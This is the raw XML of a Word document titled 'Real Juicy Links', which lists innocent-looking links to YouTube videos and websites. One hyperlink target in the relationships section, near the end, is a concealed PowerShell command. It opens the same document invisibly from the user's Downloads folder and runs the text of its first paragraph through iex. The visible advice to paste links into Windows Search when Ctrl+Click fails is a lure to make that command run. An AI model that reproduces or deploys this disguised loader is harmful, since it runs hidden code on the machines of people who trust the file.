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4701" w14:textId="3BF0F1D1" w:rsidR="0060613C" w:rsidRDefault="0060613C" w:rsidP="0031788B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031788B">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Real Juicy Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2579B46C" w14:textId="6C225489" w:rsidR="0031788B" w:rsidRPr="0031788B" w:rsidRDefault="0031788B" w:rsidP="0031788B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>If Control + Click doesn’t work, try Right Click</w:t>
      </w:r>
      <w:r w:rsidR="002D4E7E">
        <w:t xml:space="preserve"> on the link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> =&gt; Copy Hyperlink =&gt; Paste in Windows Search (bottom left).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD4DC5F" w14:textId="6B22E1D0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Real Cool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Youtube</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Video: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00712E7D" w:rsidRPr="00712E7D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=dQw4w9WgXcQ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60092ECB" w14:textId="625A364C" w:rsidR="0060613C" w:rsidRDefault="00BD0FFC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An awesome Juice: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00496E59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.nakedjuice.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F79E655" w14:textId="43A7C801" w:rsidR="0060613C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Anonymously: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00496E59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.noiys.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68891D48" w14:textId="0EAB9EA6" w:rsidR="00A50E60" w:rsidRDefault="008D2B79" w:rsidP="0060613C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post a Secret: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00496E59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://postsecret.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23D6C206" w14:textId="0E801394" w:rsidR="0060613C" w:rsidRDefault="008D2B79" w:rsidP="0060613C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Another Real Cool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Youtube</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Video: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00A73EE0" w:rsidRPr="00496E59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=YIWSEa5U9_U</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EBA19D8" w14:textId="77777777" w:rsidR="0043359C" w:rsidRDefault="0043359C"/>
    <w:sectPr w:rsidR="0043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BA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C506568"/>
    <w:lvl w:ilvl="0" w:tplc="3EAA7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3"/>
    <w:rsid w:val="0006292C"/>
    <w:rsid w:val="000A6EF1"/>
    <w:rsid w:val="000B7AE6"/>
    <w:rsid w:val="002D4E7E"/>
    <w:rsid w:val="002F2BBD"/>
    <w:rsid w:val="0031788B"/>
    <w:rsid w:val="00322793"/>
    <w:rsid w:val="00326FFF"/>
    <w:rsid w:val="003E7D85"/>
    <w:rsid w:val="0040253C"/>
    <w:rsid w:val="0043359C"/>
    <w:rsid w:val="004E3ADC"/>
    <w:rsid w:val="005E7623"/>
    <w:rsid w:val="0060613C"/>
    <w:rsid w:val="00684BF8"/>
    <w:rsid w:val="00697EBD"/>
    <w:rsid w:val="00712E7D"/>
    <w:rsid w:val="00786B53"/>
    <w:rsid w:val="007E6884"/>
    <w:rsid w:val="00844988"/>
    <w:rsid w:val="008D2B79"/>
    <w:rsid w:val="0090172B"/>
    <w:rsid w:val="00933713"/>
    <w:rsid w:val="00A0256E"/>
    <w:rsid w:val="00A16232"/>
    <w:rsid w:val="00A50E60"/>
    <w:rsid w:val="00A73EE0"/>
    <w:rsid w:val="00B00C0C"/>
    <w:rsid w:val="00BB11DA"/>
    <w:rsid w:val="00BD0FFC"/>
    <w:rsid w:val="00C872A5"/>
    <w:rsid w:val="00DF5092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C98D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CDA6D9E1-B690-4A49-9CE4-4426F315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1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0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secr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iy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kedjui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../Windows/System32/WindowsPowerShell/v1.0/powershell.exe%20-c%20%22&amp;%7b$word%20=%20new-object%20-comobject%20word.application;%20$word.visible%20=%20$false;%20$doc%20=%20$word.Documents.Open(/%22$env:userprofile/downloads/Document1.docx/%22);%20$doc.Paragraphs%5b1%5d.range.text%20|%20iex%7d%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IWSEa5U9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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-22T23:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-23T13:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>